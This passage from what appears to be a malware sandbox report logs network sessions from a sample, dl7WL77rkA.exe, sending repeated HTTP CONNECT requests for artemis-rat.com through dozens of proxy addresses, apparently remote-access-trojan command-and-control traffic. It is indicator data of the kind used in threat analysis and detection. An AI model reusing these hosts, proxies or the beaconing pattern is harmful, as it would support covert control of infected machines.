                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.701973915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405328989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            56192.168.2.549892103.76.172.23041533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.706267118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            57192.168.2.549905203.19.38.11410803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.715009928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.044532061 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            58192.168.2.54988841.223.232.11731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.729206085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.698551893 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.515249014 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            59192.168.2.549997172.67.182.118803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.736386061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.890456915 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            60192.168.2.54993243.133.71.20156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.747605085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            61192.168.2.550026104.19.247.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.751657963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.905920982 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            62192.168.2.549936106.14.255.124803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.751719952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            63192.168.2.550044104.21.194.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.757271051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.911505938 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            64192.168.2.550051104.17.37.235803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.759217024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.913362980 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            65192.168.2.550009172.67.35.15803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.763709068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.918279886 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            66192.168.2.5499555.58.239.21080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.770673990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.482949018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.514276981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.593010902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.702481031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            67192.168.2.549980128.199.202.12231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.782944918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.891786098 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            68192.168.2.55002091.134.140.160515133876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.783261061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            69192.168.2.54997442.49.148.16790013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.789592028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.132852077 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            70192.168.2.54994738.156.75.1480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.791918039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            71192.168.2.54994365.1.244.23210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.807327986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.452877998 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Content-Type: text/plain


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            72192.168.2.55004938.162.28.6131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.821671963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.259355068 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            73192.168.2.54998672.210.252.13741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.826425076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            74192.168.2.550077107.152.98.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.827290058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            75192.168.2.550106104.16.72.45803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.833049059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.987808943 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            76192.168.2.550037159.203.61.16931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.843894958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.363742113 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            77192.168.2.549984190.69.157.2139993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.849529028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
